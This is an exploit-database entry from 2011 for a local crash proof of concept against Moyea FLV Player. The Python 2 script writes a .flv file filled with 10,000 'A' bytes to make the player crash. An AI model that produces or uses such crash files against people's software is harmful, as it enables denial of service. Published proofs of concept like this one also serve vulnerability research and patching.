Moyea FLV Player(.flv)Local Crash Poc



EKU-ID: 871 CVE: OSVDB-ID:
Author: Angel Injection Published: 2011-08-23 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/python

print "#########################################################"
print "# Name: Moyea FLV Player(.flv)Local Crash Poc           #"
print "# Author: Angel Injection                               #"
print "# Email: Angel-Injection@hotmail.com                    #"
print "# home page: http://club-h.co.cc http://sec-krb.org     #"
print "#########################################################"

try :

   junk = "\x41" * 10000
   
   f = open("fuzzer.flv" ,"w")
   f.write(junk)
   f.close()
except:
    print "error"
print "<><><><><><><><><><><><><><><><><><><><><><><><><>"
print "file was created By Angel Injection successfully<>"
print "<><><><><><><><><><><><><><><><><><><><><><><><><>"